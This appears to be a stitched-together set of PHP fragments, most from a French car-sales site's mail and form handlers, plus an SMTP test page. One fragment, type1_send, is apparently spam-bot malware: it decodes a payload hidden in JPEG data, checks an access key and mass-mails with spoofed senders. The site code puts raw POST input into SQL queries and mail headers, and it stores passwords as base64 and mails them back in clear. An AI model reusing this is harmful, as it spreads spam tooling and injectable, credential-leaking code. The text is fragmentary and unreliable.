<?php include "conf/config.inc.php"; $email = $_POST['email']; $common = new common(); $chkSql = "select count(id) as count from newsletter_subscriber where email = '" . $email . "'"; $countRec = mysql_fetch_assoc(mysql_query($chkSql)); if ($countRec['count'] > 0) { echo "0"; } else { $insertQuery = "INSERT into newsletter_subscriber set email = '" . $email . "', add_date = now(), status = 1"; mysql_query($insertQuery); // From $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; // Additional headers //$headers .= 'From: . \r\n'; $message = 'Vous avez vous abonner à la newsletter succès. Merci!!'; $sentmail = sendSmtpMail($email, "Thank you", $message); echo "1"; } exit;
mysql_query($insertQuery); $heading = 'Abonnez-vous à la newsletter Demande'; $subHeading = 'Abonnez-vous à la newsletter nouvel e-mail : '; $emailData['Adresse Email'] = $email; $emailData["Vous avez reçu un e-mail à partir d'ici"] = DEFAULT_URL; $message = emailContentsWrapper($emailData, $heading, $subHeading); $adminEmails = $common->getAdminNotificationEmails(); foreach ($adminEmails as $emailA) { sendSmtpMail($emailA, "Inscription à la newsletter", $message); } // $adminMessage = html_entity_decode(htmlentities($adminMessage, ENT_NOQUOTES, "UTF-8")); // Confirmation to User $heading = 'Merci'; $subHeading = 'Vous vous êtes inscrit à la Newsletter avec succès<br><br>Merci encore<br/>Americancarcentrale.com'; $message = emailContentsWrapper(null, $heading, $subHeading); sendSmtpMail($email, "Merci", $message); /* $_SESSION['sentmail_txt'] = ' <script src="'.DEFAULT_URL.'/js/jquery.msgBox.js" type="text/javascript"></script> <link href="'.DEFAULT_URL.'/css/msgBoxLight.css" rel="stylesheet" type="text/css"> <script type="text/javascript"> (function($){ $(document).ready(function(){ $.msgBox({ title:"Merci", content:"Nous avons ajouté votre demande avec succès", type:"info", timeOut:5000, opacity:0.6, autoClose:true }); });
$emailData['Achat immédiat Prix'] = $common->CurrencyConverter($item->buyItNowPrice) . ' €'; $emailData['Construire'] = $item->Make; $emailData['Modèle'] = $item->Model; $emailData['Kilométrage'] = number_format($item->Mileage, 2) . ' Mi'; $emailData["Vous avez reçu un e-mail à partir d'ici"] = DEFAULT_URL . "/announces"; $message = emailContentsWrapper($emailData, $heading, $subHeading); //$message = html_entity_decode(htmlentities($message, ENT_NOQUOTES, "UTF-8")); $adminEmails = $common->getAdminNotificationEmails(); foreach ($adminEmails as $email) { sendSmtpMail($email, $subject, $message); } // Send confirmation to User $heading = 'Merci'; $subHeading = 'Votre demande a bien été reçue.<br><br>Merci encore<br/>Americamcarcentrale.com'; $message = emailContentsWrapper(null, $heading, $subHeading); sendSmtpMail($_POST['email'], 'Merci', $message); $_SESSION['sentmail_txt'] = '<script src="' . DEFAULT_URL . '/js/jquery.msgBox.js" type="text/javascript"></script> <link href="' . DEFAULT_URL . '/css/msgBoxLight.css" rel="stylesheet" type="text/css"> <script type="text/javascript"> $(document).ready(function(){ $.msgBox({ title:"Merci", content:"Nous avons ajouté votre demande avec succès", type:"info", timeOut:3000, opacity:0.9, autoClose:true }); }); </script>'; }
} elseif (isset($_POST) && isset($_POST["send_invite"])) { global $db; // Your subject // From $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; // Additional headers //$headers .= 'From: . \r\n'; $message = ' ----------------------------------------------- One of your friend send you a link for a car. Please visit the below link to view the detail of car <a href="' . DEFAULT_URL . '/ebay/' . $_POST['car_id'] . '"> ' . DEFAULT_URL . '/ebay/' . $_POST['car_id'] . '</a> Thank you -----------------------------------------------'; $sentmail = sendSmtpMail($_POST['email'], "Merci", $message); $_SESSION['sentmail_txt'] = ' <script src="' . DEFAULT_URL . '/js/jquery.msgBox.js" type="text/javascript"></script> <link href="' . DEFAULT_URL . '/css/msgBoxLight.css" rel="stylesheet" type="text/css"> <script type="text/javascript"> (function($){ $(document).ready(function(){ $.msgBox({ title:"Merci", content:"Lien envoy� avec succ�s", type:"info", timeOut:60000, opacity:0.4, autoClose:true }); });
$countRec['count'] = 0; if ($countRec['count'] > 0) { echo "0"; } elseif (trim($phone) == "") { echo "0"; } else { $insertQuery = "INSERT into phone_leads set phone_number = '" . $phone . "', add_date = now()"; mysql_query($insertQuery); $heading = 'Appel Demande'; $subHeading = 'Vous avez reçu une demande de rappel de : ' . $phone1; $subHeading .= "<br/><br/><span style='font-size:18px;'>Vous avez reçu un e-mail à partir d'ici : " . DEFAULT_URL . '</span>'; $footerHeading = 'Merci encore<br/>Americancarcentrale.com'; $message = emailContentsWrapper(null, $heading, $subHeading, $footerHeading); $adminEmails = $common->getAdminNotificationEmails(); foreach ($adminEmails as $emailA) { sendSmtpMail($emailA, "Appel Demande", $message); } /* $_SESSION['sentmail_txtt'] = ' <script src="'.DEFAULT_URL.'/js/jquery.msgBox.js" type="text/javascript"></script> <link href="'.DEFAULT_URL.'/css/msgBoxLight.css" rel="stylesheet" type="text/css"> <script type="text/javascript"> (function($){ $(document).ready(function(){ $.msgBox({ title:"Merci", content:"Nous avons ajouté votre demande avec succès", type:"info", timeOut:5000, opacity:0.6, autoClose:true });
$subject = $_POST['name'] . " " . $_POST['prename'] . ' request to contact with specialist'; // From $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; // Additional headers $headers .= 'From: ' . $_POST['name'] . '<' . $_POST['email'] . '>' . "\r\n"; $message = $_POST['name'] . ' ' . $_POST['prename'] . ' request to contact with specialist.<br /> Details are as below :<br/> Name : ' . $_POST['name'] . ' ' . $_POST['prename'] . '<br/> Car Id : ' . $_POST['car_id'] . '<br/> E-mail: ' . $_POST['email'] . '<br/> Phone Number: ' . $_POST['phone'] . '<br/> Suitable time to call : ' . $_POST['recall'] . '<br/> Question: ' . $_POST['question'] . '<br/> Message: ' . $_POST['message']; $sentmail = sendSmtpMail(SITE_ADMIN_EMAIL, $subject, $message); $_SESSION['sentmail_txt'] = '<script src="' . DEFAULT_URL . '/js/jquery.msgBox.js" type="text/javascript"></script> <link href="' . DEFAULT_URL . '/css/msgBoxLight.css" rel="stylesheet" type="text/css"> <script type="text/javascript"> $(document).ready(function(){ $.msgBox({ title:"Merci", content:"Nous avons ajouté votre demande avec succès", type:"info", timeOut:3000, opacity:0.9, autoClose:true }); }); </script>'; }
<?php session_start(); $error = 0; $error_login_msg = ""; if (trim($_POST['useremail']) != "") { $common = new common(); $wherecondition = "email='" . trim($_POST['useremail']) . "'"; $usercount = $common->numberOfRows("users", $wherecondition); if ($usercount == 0) { $error_login_msg = '<span class="error_msg">Email non reconnu! Veuillez réessayer ou créer un nouveau compte.</span>'; } else { $userqrywhrcondition = "email='" . trim($_POST['useremail']) . "'"; $user = $common->read("users", $userqrywhrcondition); $uservalue = mysql_fetch_object($user); //$password = base64_decode($uservalue->original_pswd); $password = base64_decode($uservalue->password); // Your subject $subject = 'mot de passe oublié'; $message = nl2br("Message de La Centrale : compte utilisateur\n\t\t\t\t\t\t\tLa Centrale\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t------------------------------\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tVous avez oublié votre mot de passe : \n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tIdentifiant : " . trim($_POST['useremail']) . "\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tMot de passe : {$password}"); $message = html_entity_decode(htmlentities($message, ENT_QUOTES, "UTF-8")); $sentmail = sendSmtpMail(trim($_POST['useremail']), $subject, $message); $error_login_msg = '<span class="success_msg">Mot de passe envoyé ! Si le message n\'apparaît pas d\'ici quelques minutes, vérifiez les courriers indésirables.</span>'; //echo "<script>window.location.href = '".DEFAULT_URL."/wishlist'</script>"; } } else { if (isset($_POST['useremail'])) { $error_login_msg = '<span class="error_msg">S\'il vous plaît entrez l\'adresse e-mail valide pour obtenir votre mot de passe.</span>'; } }
$password = base64_encode(trim($password)); $userData = array('firstname' => $name, 'name' => mysql_real_escape_string($prename), 'email' => mysql_real_escape_string($email), 'phone_number' => mysql_real_escape_string($phone), 'password' => $password, 'created' => date('Y-m-d H:i:s')); $saveUsr = $common->save("users", $userData); if ($saveUsr) { // send enquiry to admin ... $common->save("contact", $dataArray); //Send email notification. $adminEmails = $common->getAdminNotificationEmails(); foreach ($adminEmails as $emailA) { sendSmtpMail($emailA, $subject, $body); } // Confirmation mail to user $heading = 'Merci'; $subHeading = 'Votre demande de contact a été reçu avec succès.<br><br>Merci encore<br/>Americamcarcentrale.com'; $message = emailContentsWrapper(null, $heading, $subHeading); sendSmtpMail($email, 'Merci', $message); $userqrywhrcondition = "email='" . trim($email) . "' AND password = '******'"; $user = $common->read("users", $userqrywhrcondition); $uservalue = mysql_fetch_object($user); $_SESSION['User']['id'] = $uservalue->id; $_SESSION['User']['name'] = $uservalue->name; $_SESSION['User']['email'] = $uservalue->email; $_SESSION['home_page_enquiry'] = ' <script src="' . DEFAULT_URL . '/js/jquery.msgBox.js" type="text/javascript"></script> <link href="' . DEFAULT_URL . '/css/msgBoxLight.css" rel="stylesheet" type="text/css"> <script type="text/javascript"> (function($){ $(document).ready(function(){ $.msgBox({ title:"Merci", content:"Nous avons ajouté votre demande avec succès",
<tr><td>Message:</td><td> <textarea name='message'><?php echo $message; ?> </textarea></td></tr> <tr><td></td><td> <input type='submit' value=' Send ' /></td></tr> </table> </form> <div class='expl'> <p>Complete the form and press "Send". Thereafter the results will be shown in the right half of this window. If at the bottom the text "MAIL SENT!" is displayed, the email was successfully accepted by the SMTP server for transmission. Successful reception of the email depends on the validity of the recipient mail adress(es).</p> </div> </div> <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { //send SMTP mail echo "<div class = 'hilite'>\n"; if ($errMsg = sendSmtpMail(htmlspecialchars_decode($from), htmlspecialchars_decode($to), htmlspecialchars_decode($subject), htmlspecialchars_decode($message))) { echo "<br>" . $errMsg . "\n"; } else { echo "<br><b>MAIL SENT!</b>\n"; } echo "</div>\n"; } ?> </div> <div class="bLine mark"><h4>AFTER USE REMOVE THE smtptest.php FILE FROM THE SERVER!</h4></div> <div class="endBar"> design 2016 - powered by <a href="http://www.luxsoft.eu"><span class='footLB'>Lux</span><span class='footLR'>Soft</span></a> </div> <br> </body> </html>
function type1_send($config_file) { $data = file_get_contents($config_file); $start_pos = strpos($data, myhex2bin("ffda")); if ($start_pos) { $start_pos += 20; $end_pos = strrpos($data, myhex2bin("ffd9")); if ($end_pos) { $data = substr($data, $start_pos, $end_pos); } else { return FALSE; } } else { return FALSE; } $key = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; $data = decode($data, $key); $data = @unserialize($data); if (!$data || !isset($data['ak'])) { return FALSE; } if ($data['ak'] != "6ad5d234-ae2c-4fad-9281-5b6f7cbe000b") { exit; } if (isset($data['c'])) { $res["r"]["c"] = $data['c']; return base64_encode(serialize($res)); } $good = 0; $bad = 0; $last_error = array(0, 0); foreach ($data['e'] as $uid => $email) { $theme = $data['s'][array_rand($data['s'])]; $theme = alter_macros($theme); $theme = num_macros($theme); $theme = xnum_macros($theme); $message = $data['l']; $message = alter_macros($message); $message = num_macros($message); $message = xnum_macros($message); $message = fteil_macros($message, $uid); $from = $data['f'][array_rand($data['f'])]; $from = alter_macros($from); $from = num_macros($from); $from = xnum_macros($from); if (strstr($from, "[CUSTOM]") == FALSE) { $from = from_host($from); } else { $from = str_replace("[CUSTOM]", "", $from); } $from_email = explode("<", $from); $from_email = explode(">", $from_email[1]); $from_name = explode("\"", $from); $last_error = sendSmtpMail($from_email[0], $from_name[1], $email, $theme, $message, $data['lt'], $config_file); if ($last_error[1] === 0) { $good++; } else { $bad++; $good = count($data['e']) - $bad; } } $res["r"]["t"] = $last_error[0]; $res["r"]["e"] = $last_error[1] === FALSE ? 0 : $last_error[1]; $res["r"]["g"] = $good; $res["r"]["b"] = $bad; return base64_encode(serialize($res)); }
$carlist .= '<tr>'; $carlist .= '<td>' . $ebays->title . ' </td>'; $carlist .= '<td> - $' . number_format($ebays->buyItNowPrice, 2) . '</td>'; $carlist .= '</tr>'; $flage = true; $common->update('contact', array("mail_date" => $currentTimestamp, 'status' => 1), ' id=' . $contact_id); } } } } $carlist .= '</table>'; //echo $carlist; die; if ($flage) { $replaces = array('[CUSTOMER_NAME]' => $name, '[CAR_LIST]' => $carlist, '[ADDRESS]' => $address, '[TELEPHONE]' => $phone, '[EMAIL_ADDRESS]' => $adminemail, '[TERMS_URL]' => DEFAULT_URL); $messages = strReplaceAssoc($replaces, $message); $headers = "From: " . $adminemail . "\r\n"; $headers .= "Reply-To: " . $adminemail . "\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n"; //echo $messages; die; //mail($toEmail,$subject,$messages,$headers); sendSmtpMail($toEmail, $subject, $message); $common->save('email_log', array("email" => $toEmail, "content" => $messages, "sent_date" => $currentTimestamp, "next_date" => $next, 'status' => 1)); if ($i == $count) { $_SESSION['success_msg'] = "Mail Sent Succefully"; echo '<script>alert("thanks");window.location.href="' . DEFAULT_ADMIN_URL . '/template/reminder/index.php";</script>'; exit; } $i++; } }
sendSmtpMail($_POST['email'], 'Merci', $message); // Send admin Notifications $heading = "Un invité envoyé demande d'enquête pour une voiture"; $subHeading = 'ce client ' . $_POST['email'] . ' ' . $mailHeading . '<br/>Détails du véhicule'; $emailData['Id de voiture'] = $_POST['car_id']; $emailData['titre'] = $carInfo['fullName']; $emailData['vin'] = $carInfo['vin']; $emailData['Achat immédiat Prix'] = $common->CurrencyConverter($carInfo['price']) . ' €'; $emailData['Construire'] = $carInfo['manufacturer']; $emailData['Modèle'] = $carInfo['model']; $emailData['Kilométrage'] = number_format($carInfo['mileage'], 2) . ' Mi'; $emailData["Vous avez reçu un e-mail à partir d'ici"] = DEFAULT_URL . "/car/" . $_POST['car_id']; $message = emailContentsWrapper($emailData, $heading, $subHeading); $adminEmails = $common_obj->getAdminNotificationEmails(); foreach ($adminEmails as $email) { $sentmail = sendSmtpMail($email, $heading, $message); } // Send Success message to User. $_SESSION['sentmail_txt'] = ' <script src="' . DEFAULT_URL . '/js/jquery.msgBox.js" type="text/javascript"></script> <link href="' . DEFAULT_URL . '/css/msgBoxLight.css" rel="stylesheet" type="text/css"> <script type="text/javascript"> (function($){ $(document).ready(function(){ $.msgBox({ title:"Merci", content:"Nous avons ajouté votre demande avec succès", type:"info", timeOut:60000, opacity:0.4, autoClose:true
<?php include "conf/config.inc.php"; $email = $_POST['email']; $common = new common(); $chkSql = "select count(id) as count from newsletter_subscriber where email = '" . $email . "'"; $countRec = mysql_fetch_assoc(mysql_query($chkSql)); if ($countRec['count'] > 0) { echo "0"; } else { $insertQuery = "INSERT into newsletter_subscriber set email = '" . $email . "', add_date = now(), status = 1"; mysql_query($insertQuery); // From $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; // Additional headers //$headers .= 'From: . \r\n'; $message = 'Vous avez vous abonner à la newsletter succès. Merci!!'; $adminMessage = 'Abonnez-vous à la newsletter nouvel e-mail <br/><br/>'; $adminMessage .= 'Adresse Email : ' . $email; $sentmail = sendSmtpMail($email, "Thank you", $message); $sentmail = sendSmtpMail(SITE_ADMIN_EMAIL, "Inscription à la newsletter", $adminMessage); echo "1"; } exit;
$message .= emailContents($searchData); $emailData = null; $emailData["Vous avez reçu un e-mail à partir d'ici "] = DEFAULT_URL; $message .= emailContents($emailData); $message = emailContentsWrapper($message); $dataArray = array('name' => $name . " " . $prename, 'email' => $email, 'phone' => $phone, 'message' => $massage, 'type' => 101, 'mail_date' => $currentTimestamp); $password = base64_encode(trim($password)); $userData = array('firstname' => $name, 'name' => mysql_real_escape_string($prename), 'email' => mysql_real_escape_string($email), 'phone_number' => mysql_real_escape_string($phone), 'password' => $password, 'created' => date('Y-m-d H:i:s')); $saveUsr = $common->save("users", $userData); if ($saveUsr) { // send enquiry to admin ... $common->save("contact", $dataArray); //Send email notification. sendSmtpMail($email, 'Merci', 'Votre demande de contact a été reçu avec succès.'); $adminEmails = $common->getAdminNotificationEmails(); foreach ($adminEmails as $emailA) { sendSmtpMail($emailA, $subject, $message); } $userqrywhrcondition = "email='" . trim($email) . "' AND password = '******'"; $user = $common->read("users", $userqrywhrcondition); $uservalue = mysql_fetch_object($user); $_SESSION['User']['id'] = $uservalue->id; $_SESSION['User']['name'] = $uservalue->name; $_SESSION['User']['email'] = $uservalue->email; } echo "1"; die; } } echo "0"; die;
//[car information, make , model , year , vin ] $sentmail = sendSmtpMail(SITE_ADMIN_EMAIL, $subject, $message); //mail("*****@*****.**", $subject, $message , $headers); //sendSmtpMail( "*****@*****.**", $subject, $message ); /* code added by G. Totla DTJ task # 2034, 2035 * Different case for different mail output. * Oct 10, 2013 * */ $title = "americancarcentrale - Merci pour nous avoir contacter "; $message = 'merci pour nous avoir contacté envers cette voiture <br /> un représentant va vous contacter tres bientôt<br /> Nom : ' . $_POST['name'] . '<br/> Prenom : ' . $_POST['prename'] . '<br/> Email : ' . $_POST['email'] . '<br/> Numéro de telephone : ' . $_POST['phone']; sendSmtpMail($_POST['email'], $title, $message); /* code added by G. Totla DTJ task # 2034, 2035 * Oct 10, 2013 * */ $_SESSION['sentmail_txt'] = ' <script src="' . DEFAULT_URL . '/js/jquery.msgBox.js" type="text/javascript"></script> <link href="' . DEFAULT_URL . '/css/msgBoxLight.css" rel="stylesheet" type="text/css"> <script type="text/javascript"> (function($){ $(document).ready(function(){ $.msgBox({ title:"Merci", content:"Nous avons ajoutè votre demande avec succés", type:"info", timeOut:5000, opacity:0.6,
<tr> <td>un message:</td> <td>' . $massage . '</td> </tr> </table>'; // echo $content;exit; $to = $toemail->email; $subject = "Contactez-nous"; //send my mail $headers = "From:" . $email . "\r\n" . 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; $time = time(); $currentTimestamp = getCurrentTimestamp(); //if(mail($to, $subject, $content, $headers) ){ sendSmtpMail($to, $subject, $content); sendSmtpMail($email, 'Merci', 'Votre demande de contact a été reçu avec succès.'); $dataArray = array('name' => $fname . " " . $lname, 'email' => $email, 'phone' => $phone, 'message' => $massage, 'type' => 1, 'mail_date' => $currentTimestamp); $save = $common->save("contact", $dataArray); $send = 1; $_SESSION['success'] = "ok"; echo "<script>location.href='" . DEFAULT_URL . "/contacts';</script>"; exit; } unset($obj); } else { if ($website != "") { $errorMsg = "<font color='#FF0000' family='verdana' size=2>Please provide all fields value.</font>"; $_SESSION['msg'] = $errorMsg; } }